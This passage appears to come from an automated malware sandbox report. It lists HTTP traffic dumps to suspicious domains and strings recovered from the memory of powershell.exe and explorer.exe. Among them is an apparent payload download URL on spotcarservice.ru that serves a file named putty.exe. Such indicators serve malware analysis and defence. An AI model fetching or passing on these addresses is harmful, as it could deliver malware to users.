3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2D6C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BC8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: explorer.exe, 00000005.00000000.1476594910.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1477093361.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1477105934.0000000008820000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.r
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2D69A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1415473308.0000021A2D332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/f
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fd
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdj
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjs
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjsk
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf8
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88c
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cv
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/y
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yu
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yum
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumb
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/p
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/pu
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/put
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putt
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.e
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.ex
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exe
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.exep
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: explorer.exe, 00000005.00000000.1479537747.000000000C3F7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: explorer.exe, 00000005.00000000.1477420367.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000005.00000000.1475786378.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
                Source: explorer.exe, 00000005.00000000.1477420367.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: explorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2BC92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2C912000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: powershell.exe, 00000002.00000002.1415473308.0000021A2D6C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1434237324.0000021A3BAE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: explorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000005.00000000.1477420367.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 00000005.00000000.1479537747.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 00000005.00000000.1475786378.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
